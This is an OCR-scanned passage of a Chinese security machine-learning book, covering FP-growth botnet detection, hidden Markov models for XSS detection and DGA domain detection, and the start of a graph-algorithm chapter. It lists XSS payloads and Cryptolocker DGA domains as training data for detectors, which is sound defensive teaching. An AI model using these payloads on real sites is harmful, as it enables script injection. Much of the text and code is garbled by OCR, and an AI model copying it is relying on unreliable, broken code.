with open ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/KnowledgeGraph/sample7.txt") as f: 
for line in f: 
line=line.strip('\n') 
ip,ua,target=line.split(',') 

print "Add ($s $s %s)" $ (ip,ua,target) 
transactions.append([ip,ua,target]) 
































建设 满足 的 条 件 为 支持 度 为 3， 置 信 度 为 0.7 的 即 认为 是 疑似 僵尸 主机 : 























patterns = pyfpgrowth.find frequent patterns (transactions, 3) 
rules = pyfpgrowth.generate association rules (patterns, 0.9) 





经 过 FP-growth 算 法 挖掘 ， 满 足 条 件 的 结果 为 : 


(('target-urll',): (('ua=ual',), 1.0)] 





11.7. 本章 小 结 


本 章 介 绍 了 大 名 蝴 刚 的 尿布 算法 ， 即 Aptiori 和 FP-growth。 在 实际 问题 中 关联 算法 通常 作为 其 他 算法 的 辅助 手段 ， 所 以 本 章 主 要 介绍 基本 概念 和 基本 用 法 。 
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我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进 一 步 学 习 ， 欢 迎 到 这 些 网 站 进 一 : 
- http://blog.csdn.net/lizhengnanhua/atticle/details/9061755 

: https:/ /wenku.baidu.com/view/01536f13221614791711286b.html 

还 有 以 下 参考 文献 值得 一 读 : 


[1] Peter Hartington， 机 器 学 习 实 战 [M， 李 锐 ， 李 鹏 ， 曲 亚 东 ， 等 译 .北京 : 人 民 邮 电 出 版 社 ，2013. 


第 12 草 ” 隐 式 马尔 可 夫 算 法 


隐 式 马尔 可 夫 算 法 特别 适合 处 理 时 序数 据 ， 善 于 挖掘 时 序数 据 前 后 的 关系 ， 常 常 应 用 于 语音 识别 和 自然 语言 处 理 领域 。 在 网 络 安全 领域 也 广泛 存在 时 序数 据 ， 比 如 网 站 的 访问 顺序 、 系 统 调用 的 顺序 、 
管理 员 的 操作 命令 等 ， 都 适合 这 种 算法 。 本 章 将 介绍 隐 式 马尔 可 夫 划 法 的 基本 概念 ， 并 给 出 基本 的 使 用 方式 ， 并 介绍 基于 不 同 的 特征 提取 方式 使 用 隐 式 马尔 可 夫 算 法 来 识别 XSS 攻 击 ， 以 及 如 何 使 用 隐 式 马 


尔 可 夫 算 法 识别 DGA 域 名 。 


现实 世界 中 有 一 类 问题 具有 明显 的 时 序 性 ， 比 如 路 口红 绿灯 、 连 续 几 天 的 天 气 变化 ， 我 们 说 话 的 上 下 文 。 马 尔 可 夫 ， 俄 国 数学 家 ， 见 图 12-1， 提 出 著名 的 马尔 可 夫 链 。 隐 式 马 尔 可 夫 模 型 (Hidden 
Markov Model, HMM) 的 基础 假设 是 ， 一 个 连续 的 时 间 序 列 事件 ， 它 的 状态 由 且 仅 由 它 前 面 的 N 个 事件 决定 ， 对 应 的 时 间 序 列 可 以 成 为 N 阶 马尔 可 夫 链 。 





图 12-1 ARTA 


假设 今天 是 否 有 雾 考 只 由 前 天 和 昨天 决定 ， 于 是 就 构成 了 一 个 二 阶 马尔 可 夫 链 ， 见 图 12-2。 若 昨天 和 前 天 都 是 晴天 ， 那 么 今天 是 晴天 的 概率 就 是 90%。 


稍微 再 复杂 点 ， 假 设 你 想 知道 2000 干 米 外 一 个 城市 的 雾 才 情况 ， 但 是 你 没 法 直接 去 当地 看 到 空气 情况 ， 手 头 只 有 当地 风力 情况 ， 也 就 是 说 空气 状态 是 隐藏 的 ， 风 力 情况 是 可 观察 的 ， 需 要 通过 可 观察 序 
列 推测 隐藏 序列 ， 如 图 12-3 所 示 。 由 于 风力 确实 对 雾 恤 情况 有 较 大 影响 ， 甚 至 可 以 假设 风力 大 的 情况 下 909% 概 率 是 晴天 ， 所 以 通过 样本 学 习 ， 确 实 可 以 达到 从 前 观察 序列 推测 隐藏 序列 的 效果 ， 这 就 是 隐 式 
马尔 可 夫 模 型 。 





图 12-2 ”天气 转化 





观察 序列 


图 12-3 ”结合 风力 判断 雾 考 情况 


HMMLearn 是 Python 下 的 一 个 HMM 实 现 ， 是 从 Scikit-Learn 独 立 出 来 的 一 个 项 目 ， 依 赖 环境 如 下 : 
: Python>=2.6; 

: NumPy (tested to wotk with>=1.9.3) ; 

: SciPy (tested to work with>=0.16.0) ; 

- Scikit-Learn>=0.16。 


安装 命令 如 下 : 


12.2 hello world! 隐 式 马尔 可 夫 


完整 演示 代码 请 见 本 书 GitHub 上 的 12-1.py。 


1. 导 入 相关 库 





print( doc ) 

import numpy as np 

import matplotlib.pyplot as plt 
from hmmlearn import hmm 





2. 训 | 练 模型 


startprob = np.array([0.6, 0.3, 0.1, 0.0]) 

# The transition matrix, note that there are no transitions possible # between component 1 and 3 
transmat = np.array([[0.7, 0.2, 0.0, 0.1], [0.3, 0.5, 0.2, 0.0], 

[0.0, 0.3, 0.5, 0.2], [0.2, 0.0, 0.2, 0.6]]) 

# The means of each component 

means = np.array([[0.0, 0.0], 











[0.0, 11.0], 
[9.0, 10.0], 
[11.0, -1.0]]) 





# The covariance of each component 

covars = .5 * np.tile(np.identity(2), (4, 1, 1)) 

# Build an HMM instance and set parameters model = hmm.GaussianHMM(n components-4, covariance type-"full") 

# Instead of fitting it from the data, we directly set the estimated 4 parameters, the means and covariance of the components 












































model.startprob = startprob 
model.transmat = transmat 
model.means = means 
model.covars = covars 

3. 可 视 化 


# Generate samples 

X 2 = model.sample (500) 
# Plot the sampled data 
plt.plot (X[:, 0], X[:, 1], ".-", label="observations", ms=6, mfc-"orange", alpha=0.7) 
# Indicate the component numbers 
for i, m in enumerate (means): 




















plt.text(m[0], m[1], 'Component £i' $ (i + 1), size=17, horizontalalignment-'center', bbox-dict(alpha-.7, facecolor-'w')) plt.legend(loc-'best') 





plt.show () 


结果 如 图 12-4 所 示 。 
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图 12-4 HMM 演 示 代 码 


12.3 示例: 使 用 隐 式 马尔 可 夫 算 法 识别 XSS 攻 击 (一 ) 


完整 演示 代码 请 见 本 书 GitHub 上 的 12-2.py。 
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1. 参 数 建 模 


常见 的 基于 GET 请 求 的 XSS、SQL 注 入 、RCE， 其 攻击 载荷 主要 集中 在 请 求 参数 中 ， 以 XSS 为 例 : 











/0 1/include/dialog/select media.php?userid-$3Cscript$3Ealert (1) $3C/script$3E 











正常 的 http 请 求 中 参数 的 取 值 范围 都 是 确定 的 ， 这 里 说 的 确定 是 指 可 以 用 字母 数字 特殊 字符 来 表示 ， 并 非 说 都 可 以 用 1 ~ 200 这 种 数值 范围 来 确定 。 以 下 面 的 几 条 日 志 为 例 : 


/0 1/include/dialog/select media.php?userid=admin123 





1/include/dialog/select media.php?userid-root 





1/include/dialog/select media.php?userid-maidou0806 


/0 1/include/dialog/select media.php?userid-52maidou 








1/include/dialog/select media.php?userid-wjq 2014 




















1/include/dialog/select media.php?userid=mzc-cxy 











肉眼 观察 可 以 归纳 出 userid 字 段 由 字母 数字 和 特殊 字符 '-_“ 组 成 ， 如 果 你 足够 强大 可 以 看 完 上 万 的 正常 样本 ， 甚 至 都 可 以 总 结 取 值 学 围 为 由 字母 、 数 字 、 下 划 线 、 连 字符 组 成 ， 且 长 度 大 于 等 于 4， 使 用 
正则 表达 式 即 为 [0-9a-zA-Z-_]{4，}。 如 果 有 上 亿 的 日 志 含 上 百 万 的 参数 ， 人 工 如 何 完成 ? 这 时 候 机 器 学 习 可 以 友 挥 作用 了 。 


以 uid 字 段 为 例 ，uid 的 取 值 作为 观察 序列 ， 简 化 期 间 可 以 对 uid 的 取 值 进行 范 化 ， 整 个 模型 为 三 阶 HM M ， 隐 藏 序列 的 状态 只 有 四 个 ，S1、S2、S3、S4: 
. [a-zA-Z] 范 化 为 A; 

[0-9] 范 化 为 N; 

人 -] 范 化 为 Cj; 


其 他 字符 范 化 为 T。 


以 URL 参 数 wjq_2014 为 例 ， 转 换 过 程 如 图 12-5 所 示 ， 观 察 序列 是 wjq_2014， 对 应 的 范 化 为 AAAACNNN， 对 应 的 隐藏 序列 为 S$1 S1 S1 S2 S3 S3 S3 S3, 


图 12-5” ”URL 参数 建 模 


同 理 ，URL 参 数 admin 123 和 root 范 化 结果 为 : 
: admin123 范 化 为 AAAAANNN; 


.toot 范 化 为 AAAA。 








= = å- e å e cmo Ri m nd 


观察 序列 





图 12-6 ”HMM 状态 迁移 


隐藏 序列 就 是 S1 ~ S4 四 个 状态 间 循 环 转化 〈 见 图 12-6) ， 这 个 概率 称 为 转移 概率 矩阵， 同时 四 个 状态 都 有 确定 的 概率 ， 以 观察 序列 中 的 A、C、N、T 4 个 状态 展现 ， 这 个 转换 的 概率 称 为 发 射 概 率 矩 
阵 。HM M 建 模 过 程 就 是 通过 学 习 样 本 ， 生 成 这 两 个 矩阵 的 过 程 。 


典型 的 转移 概率 矩阵 如 表 12-1 所 示 。 


表 12-1 转移 概念 矩阵 示例 
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典型 的 发 射 概 率 和 矩阵 如 表 12-2 所 示 。 


表 12-2 发射 概念 矩阵 示例 





S1 S2 S3 S4 
S1 0.2 0.3 0.3 0.2 
S2 0.2 0.2 0.3 0.3 
S3 0.3 0.1 uz 0.4 
S4 0.4 0.2 0.2 0.2 





在 生产 环境 中 范 化 需 谨 慎 ， 至 少 域名 、 中 文 等 特殊 字符 需要 再 单独 范 化 、。 
2. 数 据 处 理 与 特征 提取 


由 于 每 个 域名 的 每 个 url 的 每 个 参数 的 范围 都 可 能 不 一 样 ， 有 的 userid 可 能 是 [0-9] 人 4，}， 有 的 可 能 是 [0-9a-zA-Z-_]{3，}， 所 以 需要 按照 不 同 域名 的 不 同 url 的 不 同 参 数 分 别 学 习 。 范 化 过 程 如 下 : 


def etl(str): 

vers-[] 

for i, c in enumerate (str): 
c=c. lower () 














if ord(c) >= ord('a') and ord(c) <= ord('z'): 
vers.append([ord('A')]) 

elif ord(c) >= ord('0') and ord(c) <= ord('9'): 
vers.append([ord('N')]) 

else: 





vers.append ( [ord ('C') ]) 
return np.array (vers) 


友情 提示 : 为 了 避免 中 文 等 字符 的 干扰 ，ASCIl 值 大 于 127 或 者 小 于 32 的 可 以 不 处 理 直 接 跳 过 。 


从 weblog 中 提取 url 参 数 ， 需 要 解决 url 编 码 、 参 数 抽取 等 严峻 问题 ， 还 好 Python 有 现成 的 接口 : 











with open(filename) as f: 
for line in f: 

HBR 

ult = urlparse.urlparse (line) 
Url 解码 
uery-urllib.unquote (result.query) 

arams = urlparse.parse qsl(query, True) 
or k, v in params: 7 


k 为 参数 名 ，v 为 参数 值 











十 
nx] 





H 
0) 
n 








Q3 








WO 








= | 


友情 提示 : urlparse.parse_qs| 解 析 url 请 求 切割 参数 时 ， 遇 到 ' ;会 截断 ， 导 致 获取 的 参数 值 缺失 '; “后 面 的 内 容 ， 这 是 个 大 坑 ， 在 生产 环境 中 一 定 要 注意 这 个 问题 。 
3. 训 练 模型 


将 范 化 后 的 向 量 X 以 及 对 应 的 长 度 和 矩阵 X_lens 输 入 即 可 。 需 要 X_lens 的 原因 是 参数 样本 的 长 度 可 能 不 一 致 ， 所 以 需要 单独 输入 : 





remodel = hmm.GaussianHMM(n components-3, covariance type-"full", n iter-100) 
remodel.fit(X,X lens) 














训练 样本 得 分 为 : 


Score:16 query param:admin123 
Score:9 query param:root 
Score:21 query param:maidou0806 
Score:16 query param:52maidou 
Score:15 query param:wjq 2014 
Score:12 query param:mzc-cxy 























4. 模 型 验证 


HM M 模 型 完成 训练 后 通常 可 以 解决 3 大 类 问题 : 一 是 输入 观察 序列 获取 概率 最 大 的 隐藏 序列 ， 最 典型 的 应 用 就 是 语音 解码 以 及 词性 标注 ;二 是 输入 部 分 观察 序列 预测 概率 最 大 的 下 一 个 值 ， 比 如 搜索 词 
猜想 补 齐 等 ; 三 是 输入 观察 序列 获取 概率 ， 从 而 判断 观察 序列 的 合法 性 。 参 数 异常 检测 就 输入 第 三 种 。 


我 们 定义 T 为 闪 值 ， 概 率 低 于 T 的 参数 识别 为 异常 ， 通 常会 定义 T 比 训练 集 最 小 值 略 大 ， 在 此 例 中 可 以 取 10: 











with open(filename) as f: 
for line in f: 
# 切割 参数 
result = urlparse.urlparse (line) 
# url 解 人 码 
query = urllib.unquote (result.query) 

params = urlparse.parse qsl(query, True) 
for k, v in params: 7 
f ischeck(v) and len(v) >=N : 
ers = etl (v) 
ro = remodel.score (vers) 
f pro <=T: 

print "PRO:%d V:%s LINE:%s " % (pro,v, line) 
































p. 








LO < 

















以 userid=%3Cscript%3Ealert (1) %3C/script%3E 为 例子 ， 经 过 解码 后 为 <script>alert (1) </script> ， 范 化 后 为 TAAAAAATAAAAATNTTTAAAAAAT，score 为 -13945， 识 别 为 异常 。 这 种 HMM 
的 使 用 方式 是 通过 学 习 正 常 来 识别 异常 ， 即 通常 说 的 “以 白 找 黑 ”。 “以 白 找 黑 ” 的 优点 非常 明显 ， 就 是 理论 上 可 以 发 现 全 部 基于 参数 的 异常 访问 ， 但 是 ， 缺 点 是 扫描 器 访问 、 代 码 异 常 、 用 户 的 错误 操 
作 、 业 务 代码 的 升级 等 ， 都 会 产生 大 量 误 报 ; 所 以 目前 另外 一 种 开始 流行 的 方法 是 ， 通 过 学 习 攻 击 报 文 ， 训 | 练 攻击 模型 ， 然 后 “以 黑 找 黑 ”。 这 种 方法 虽然 理论 上 可 能 会 遗漏 真实 攻击 ， 但 是 结果 更 加 可 
控 ， 可 以 达到 可 运 维 状 态 。 下 面 我 们 将 介绍 基于 HMM 的 “以 黑 找 黑 ”。 


12.4 zm): 使 用 隐 式 马尔 可 夫 算 法 识别 XSS 攻 击 (Z) 


完整 演示 代码 请 见 本 书 GitHub 上 的 12-3.py。 

1. 参 数 建 模 

这 次 我 们 换个 思路 ， 如 图 12-7 所 示 ， 把 机 器 当 作 一 个 刚 入 行 的 白 帽 子 ， 我 们 训练 他 学 会 XSs 的 攻击 语法 ， 然 后 再 让 机 器 从 访问 日 志 中 寻找 符合 攻击 语法 的 疑似 攻击 日 志 。 
通过 词法 分 割 ， 可 以 把 攻击 载荷 序列 化 成 观察 序列 ， 如 图 12-8 所 示 。 

2. 词 集 / 词 袋 模型 


词 集 和 词 袋 模型 是 机 器 学 习 中 极 囊 用 的 数据 处 理 模型 ， 它 们 用 于 特征 化 字符 串 型 数据 。 一 般 思路 是 将 样本 分 词 后 ， 统 计 每 个 词 的 频率 ， 即 词 频 ， 根 据 需要 选择 全 部 或 者 部 分 词 作为 哈 希 表 键 值 ， 并 依次 
对 该 哈 希 表 编 号 ， 这 样 就 可 以 使 用 该 哈 希 表 对 字符 串 进行 编码 。 


<script>alert('XSS')</script> 
%3cscript%3ealert('XSS')%3c/script%3e 


%22%3 e%3cscript%o3ealert(‘XSS')%3c/script%3e 
<IMG SRC="javascript:alert('"XSS');"> 





学 会 XSS 语法 


<script>alert(/2/)</script> 


满足 语法 







<script>alert(/2/)</script> 
<img src="http://xi.baidu.com/1. gif"> 







不 满足 语法 






«img src="http://x1.baidu.com/gif"> 


图 12-7 检测 思路 原理 图 


<script>alert (XSS') </script> 





序列 化 


«/script^ 





图 12-8 攻击 载荷 序列 化 


MRR: 单词 构成 的 集合 ， 集 合 中 自然 每 个 元 素 都 只 有 一 个 ， 即 词 集 中 的 每 个 单词 都 只 有 一 个 。 
RRA: 如 果 一 个 单词 在 文档 中 出 现 不 止 一 次 ， 统 计 其 出 现 的 次 数 。 
本 章 使 用 词 集 模型 即 可 。 


假设 存在 如 下 数据 集合 : 








dataset = [['my', 'dog', 'has', 'flea', 'problems', 'help', 


首先 生成 词汇 表 : 


'please'], 


['maybe', 


'not', 


'take', 


'him', 


'to!, 


"dog', 


'park', 


'stupid!], 


['my', 


'dalmation', 


‘is! 


, 


'so', 


‘Gute’, 





vocabSet = set () 

for doc in dataset: 
vocabSet |= set (doc) 
vocabList = list (vocabSet) 








根据 词汇 表 生 成 词 集 : 


# 词 集 模型 
SOW = [] 
for doc in dataset: 
vec = [0]*len(vocabList 
for i, word in enumerate (vocabList): 
if word in doc: 
vec[i] = 1 
SOW.append (doc) 


— 














简化 后 的 词 集 模型 的 核心 代码 如 下 : 





fredist = nltk.FreqDist(tokens list) # 单 文件 词 频 
keys=fredist.keys () 
keys-keys[:max] # 只 提取 前 N 个 频 发 使 用 的 单词 其 余 泛 化 成 0 
for localkey in keys: # 获取 统计 后 的 不 重复 词 集 


























if localkey in wordbag.keys(): # 判断 该 词 是 否 已 在 词 集中 
continue 

else: 
wordbag[localkey] = index wordbag 


index wordbag += 1 





3. 数 据 处 理 与 特征 提取 


TS AMBISXSSIS EEG RT T : 















































<script>alert ('XSS')«/script» 
$3cscript$3ealert ('XSS') $3c/script$3e 
$22%3e%3cscripts3ealert ('XSS') $3c/script%3e 
<IMG SRC="Javascript:alert ('XSS');"> 

<IMG SRC-javascript:alert (&quot; XSS&quot; ) > 
<IMG SRC=javascript:alert ('XSS')> 

<img src-xss onerror=alert (1)» 

«IMG """><SCRIPT>alert ("XSS") </SCRIPT>"> 
<IMG SRC-javascript:alert (String. fromCharCode (88, 83,83) ) > 
<IMG SRC-"jav ascript:alert('XSS');"> 

<IMG SRC="Javé#x09;ascript:alert ('XSS') ;"> 
<BODY BACKGROUND-"javascript:alert('XSS')"» 
<BODY ONLOAD=alert ('XSS')> 





需要 支持 的 词法 切 分 原则 为 : 


“ 单 双 引 号 包含 的 内 容 ; 


'XSS' 


: http/https 链 接 ，; 


http://xi.baidu.com/xss.js 


“<> 标签 ， 


<script> 





"<> 标签 开头 ，; 


<BODY 





属性 标签 ; 


ONLOAD- 





<> 标签 结尾 ; 








"javascript:alert ('XSS');" 


代码 实现 举例 如 下 : 





tokens pattern = r'''(?x) 
"pan +" 

http://\S+ 

</\wt> 

<\wt> 

<\wt 

\wt= 











\w+ 


> 
\wt\ ([^<]+\) # 函数 比如 alert (String. fromCharCode (88, 83, 83) ) 


words-nltk.regexp tokenize(line, tokens pattern) 


另外 ， 为 了 减少 向 量 空间 ， 需 要 把 数字 、 字 符 以 及 超 链 接 范 化 ， 具 体 原 则 为 : 





# 数 字 常 量 蔡 换 成 8 

line, number = re.subn(r'\d+', "8", line) 

fulrH 换 成 http://u 

line, number = re.subn(r' (httpl|https)://[a-zA-20-9\.@&/#!#\?]+', "http://u", line) 
THET 

line, number = re.subn(r'\/\*.?\*\/', "", line) 











范 化 后 分 词 效果 示例 为 : 












































# 原 始 参数 值 : "><img src-x onerror=prompt (0) >) 

# 分 词 后 : 

['2', '«img', 'src-', 'x', 'onerror-', 'prompt(8)', '»'] 

# 原 始 参数 值 : «iframe src-"x-javascript&colon; alert (document .domain) ;"></iframe>) 

# 分 词 后 : 

['«iframe', 'src-', '"x-javascript&colon;alert (document.domain);"', '»', '</iframe>'] 

# 原 始 参数 值 : «marquee»«h1»XSS by xss«/hl»«/marquee» ) 

t2 un: 

['<marquee>', '<h8>', 'XSS', 'by', 'xss', '</h8>', '</marquee>'] 

# 原 始 参 数值 : «script»--alert;-(1)«/script» "onmouseover="confirm(document.domain) ;"" </script>) 

# 分 词 后 : 

['«script»', 'alert', '8', '</script>', '"onmouseover-"', 'confirm(document.domain)', '</script>"'] 
# 原 始 参数 值 : «script»alert (2) «/ Script» "><img src=x onerror=prompt (document .domain) >) 

# 分 词 后 : 

['«script»', 'alert(8)', '«/script»', '»', '«img', 'src-', 'x', 'onerror-', 'prompt (document.domain)', '>"] 





结合 词 集 模型 ， 完 整 的 处 理 流程 如 图 12-9 所 示 。 


<IMG SRC= x onblur= "alert(String.fromCharCode(88,83,83))"> 


<IMG SRC= S onblur- "alert(String.fromCharCode(8,8,8))"> 





分 词 


alert(String. 
S onblur fromCharCode 
(8,8,8)) 





in] f Ap f 


图 12-9 词 集 模型 处 理 流 程 


4 训练 模型 


将 范 化 后 的 向 量 X 以 及 对 应 的 长 度 和 矩阵 X_lens 输 入 即 可 。 需 要 X_lens 的 原因 是 参数 样本 的 长 度 可 能 不 一 致 ， 所 以 需要 单独 输入 。 








remodel = hmm.GaussianHMM(n components-3, covariance type-"full", n iter-100) 
remodel.fit(X,X lens) 

















5. 验 证 模型 


整个 系统 运行 过 程 如 图 12-10 所 示 。 





XSS 攻击 训练 样本 编码 并 序列 化 


HMM 模型 训练 


学 习 XSS 语法 


编码 并 序列 化 M HMM 检测 模型 








XSS 攻击 测试 样本 分 词 





图 12-10 ”系统 运行 流程 


验证 阶段 利用 训练 出 来 的 HMM 模 型 ， 
特征 进行 编码 并 序列 化 。 使 用 20000 条 正常 日 志和 20000 条 XSS 攻 击 识别 (类似 JSFUCK 这 类 编码 暂时 不 支持 ) ， 准 确 率 达 到 90% 以 上 ， 其 中 验证 环节 的 核心 代码 如 下 : 


输入 观察 序列 获取 概率 ， 从 而 判断 观察 序列 的 合法 性 。 训 练 样本 是 1000 条 上 典型 的 XSS 攻 击 日 志 ， 通 过 分 词 、 计 算 词 集 ， 提 炼 出 200 个 特征 ， 全 部 样本 就 用 这 200 个 





(filename) as f: 

ine in f: 

line = line.strip('\n"') 
line = urllib.unquote (line) 
h = HTMLParser.HTMLParser () 
line = h.unescape (line) 

if len(line) >= MIN LEN: 








with open 
for 7 



























































line, number = re.subn(r'\d+', "8", line) 
line, number = re.subn(r' (http|https) ://[a-zA-Z0-9\.@&/#!#\2:]+', "http://u", line) 
line, number = re.subn(r'\/\*.?\*\/', "", line) 
words = do str(line) 
vers = [] 
for word in words: 
if word in wordbag.keys(): 
vers .append ( [wordbag [word] ] ) 
else: 
vers .append ([-1]) 
np vers = np.array (vers) 
pro = remodel.score (np vers) 
if pro >= T: 7 
print "SCORE: (%d) XSS URL: (%s) " % (pro, line) 








12.5 示例 : 使 用 隐 式 马尔 可 夫 算 冯 识 别 DGA 域 名 


完整 演示 代码 请 见 本 书 GitHub 上 的 12-4.py。 
1. 参 数 建 模 


DGA 通 常 是 基于 当前 时 间 、 硬 编码 的 常量 以 及 字典 ， 根 据 一 定 的 算法 生成 ， 如 图 12-11 所 示 。 


时 间 
Rt Ap RE 





字典 





































































































图 12-11 DGA 原 理 图 
以 僵尸 网 络 cryptolocker 的 DGA 算 法 为 例 ， 生 成 的 DGA 与 时 间 关 系 如 下 : 
wwkahhnyqvxdfq.com,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.tx 
kpudegrfqeuadh.net,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.tx 
xraxhxvadmpgdn.biz,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.tx 
ldjhqijygqrudp.ru,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.txt 


























yfoctantsymbmt.org,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.tx 
mxyfqyrashjxdv.co.uk,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.txt 
aaeatqvufpeedj.info,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.txt 
rnpwcfjkeiybhu.com,Domain used by Cryptolocker - Flashback DGA for 13 Apr 2017,2017-04-13,http://osint.bambenekconsulting.com/manual/cl.txt 


























































































































2. 数 据 处 理 与 特征 提取 


域名 特征 提取 流程 如 图 12-12 所 示 。 


域名 数据 


baldu.com 


序列 化 


baldu.com 


by 


四 量化 


e Pls PLE pla PLUS. e Plo Pim 


图 12-12 ”域名 特征 提取 


Alexa 是 一 家 专门 发 布 网 站 世界 排名 的 网 站 。 以 搜索 引擎 起 家 的 Alexa 创 建 于 1996 年 4 月 (SEE) 。Alexa 每 天 在 网 上 搜集 超过 1000 GB 的 信息 ， 不 仪 给 出 多 达 几 十 亿 的 网 址 链接 ， 而 且 为 其 中 的 每 一 个 网 
站 进行 排名 。 可 以 说 ，Alexa 是 当前 拥有 URL 数 量 最 庞大 、 排 名 信息 发 布 最 详尽 的 网 站 。 我 们 使 用 Alexa 全 球 排名 前 100 万 的 网 站 的 域名 训练 HMM 模 型 。 


加 载 域名 数据 代码 如 下 : 











def load alexa (filename): 
domain list-[] 
csv reader = csv.reader (open (filename) ) 
for row in csv reader: 

domain-row[1] 

if domain >= MIN LEN: 

domain list.append (domain) 

return domain list 
































数据 格式 如 图 12-13 所 示 。 





youtube. com 
facebook. com 
baidu. com 
wikipedia. org 


yahoo. com 
reddit. com 
google. co. in 


qq. com 


0, twitter. com 


搜集 常见 僵尸 网 络 的 DGA 数 据 ， 具 体 数据 请 见 本 书 对 应 的 GitHub 链 接 。 


加 载 DGA 数 据 代码 如 下 : 


d 








(D 


f load dga (filename): 
domain list=[] 


#xsxqeadsbgvpdke.co.uk,Domain used by Cryptolocker - Flashback DGA {| 





4 http: //osint.bambenekconsulting.com/manual/cl.txt 


with open(filename) as f: 
for line in f: 

















domain=line.split(",") [0] 














if domain >= MIN LE 











iN: 


domain list.append (domain) 


return domain list 





图 12-13 ”Alexa 排 名 数据 





For 13 Apr 2017,2017-04-13, 








特征 化 逻辑 非常 简单 ， 直 接 转化 成 对 应 的 ASCII 即 可 : 








def domain2ver (domain): 
ver-[] 








for i in range (0, len (domain)): 


ver.append ( [ord (domain [i])]) 


return ver 


3. 训 





练 模型 


使 用 默认 参数 的 HM M 训 











def train hmm(domain list): 

X = [[0]] 

X lens = [1] 

for domain in domain list: 
ver=domain2ver (domain) 
np ver = np.array (ver) 








练 Alexa 域 名 即 可 : 


X-np.concatenate ([X,np ver]) 
X lens.append(len(np ver)) 
remodel = hmm.GaussianHMM(n components-N, covariance type-"full 








remodel.fit(X,X lens) 








, n iter-100) 











joblib.dump(remodel, FILE MODEL) 














return remodel 





4. 验 证 模型 


使 用 搜集 的 两 个 不 同 家 族 的 僵尸 网 络 来 验证 模型 ， 这 两 个 家 族 分 别 是 cryptolocker 和 post-tovar-goz: 








if name == ' main ': 
domain list = load alexa("h 

















remodel-joblib.load(FILE MO 








(Lh) 























X 2,y 2-test dga (remodel, "h 
fig,ax-plt.subplots() 

















tp://www.hzcourse.com/resource/readl 





Book?pa! 





ax.set xlabel('Domain Length') 





ax.set ylabel('HMM Score') 

















ax.scatter(x 3,y 3,color-'b',label-"dga post-tovar-goz") 














ax.scatter(x 2, y 2, color-'g', label-"dga cryptolocker") 


ax. legend (loc-'right') 
plt.show () 





th=/openresources/' 


tp: //www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/] 
DE 
x 3,y 3-test dga(remodel, "h 





teach ebook/uncompressed/1 


16472/0E! 








16472/0E 





€ 





;«BPS/Tex! 








t/../dat 


BPS/Text/../data/top-1000 


ttp: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/dga-pos! 





.csv") 


t-tovar-goz-1000.txt") 





ta/dga-crypt 


tolocke-1000.txt") 





为 了 方便 对 比 两 个 家 族 的 聚 类 效果 ， 我 们 以 域名 长 度 为 横 轴 ，HMM 值 为 纵 轴 作 图 ， 结 果 如 图 12-14 所 示 。 


一 
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_80 see dga post-tovar-goz 


ete dga cryptolock 


—100 
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~120 
—140 
—160 





一 180 
10 15 20 25 30 35 
Domain Length 


图 12-14 不 同 僵尸 家 族 聚 类 效果 


可 见 HMM 作 为 DGA 僵 尸 网 络 区 分 的 一 个 变量 ， 非 常 具有 区 分 性 ， 进 一 步 的 区 分 还 需要 增加 变量 ， 使 用 SVM 等 算法 作为 区 分 。 


12.6 本章 小 结 


本 章 介 绍 了 HMM 的 基础 知识 ， 结 合 XSS 检 测 实 现 了 两 种 检测 思路 ;第 一 种 是 学 习 正 常 业 务 模型 识别 异常 ， 第 二 种 是 学 习 攻 击 模型 进一步 识别 满足 攻击 语法 的 攻击 行为 。 另外， 还 以 DGA 聚 类 为 例 ， 介 绍 
了 基于 HMIM 算 法 生成 重要 特征 的 方法 。 


参考 资源 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
: http://hmmlearn.readthedocs.io/en/latest/ 
- http://www.freebuf.com/articles/network/114693.html 
还 有 一 些 参考 文献 值得 一 读 : 
[1] Bilge L, Kirda E, Kruegel C, Balduzzi M.Exposure: Finding malicious domains using passive DNS analysis. Network&Distributed System Security Symposium, 2011. 
[2] Igino Corona, Davide Ariu, Giorgio Giacinto. HMM-Web: a Framework for the Detection of Attacks Against Web Applications. IEEE International Conference on Communications, 2009, 15 (1) : 747-752. 
[3] WangK, Stolfo S J. Anomalous Payload-Based Network Intrusion Detection. Recent Advances in Intrusion Detection: International Symposium, 2004, 3224: 203-222. 
[4] Ingham KL, Somayaj A, Burge J, Forrest S.Learning DFA Representations of HTTP for Protecting Web Applications.Computer Networks, 2007, 51 (5) : 1239-1255. 


[5] C Kruegel, G Vigna, W Robettson.A Multi-Model Approach to the Detection of Web-Based at-Tacks.Computer Networks, 2005. 


第 13 章 ”图 算法 与 知识 图 谐 


图 算法 广泛 应 用 于 存在 大 量 非 结 构 化 网 状 数据 的 领域 ， 如 社交 网 络 、 金 融 、 交 通 、 搜 索 等 ， 是 一 种 非常 简单 易 用 且 有 效 的 机 器 学 习 算 法 ， 算 法 的 思想 也 非常 容易 理解 。 而 网 络 安全 领域 在 风 控 、 威 胁 情 
报 方面 也 有 很 多 非 结构 化 网 状 数据 ， 所 以 也 会 用 到 图 算法 。 本 章 将 介绍 图 的 基本 概念 ， 并 给 出 基本 的 使 用 方式 ， 介 绍 如 何 使 用 有 向 图 识别 WebShell， 如 何 使 用 有 向 图 识别 僵尸 网 络 中 的 同一 黑 产 团体 ， 将 结 
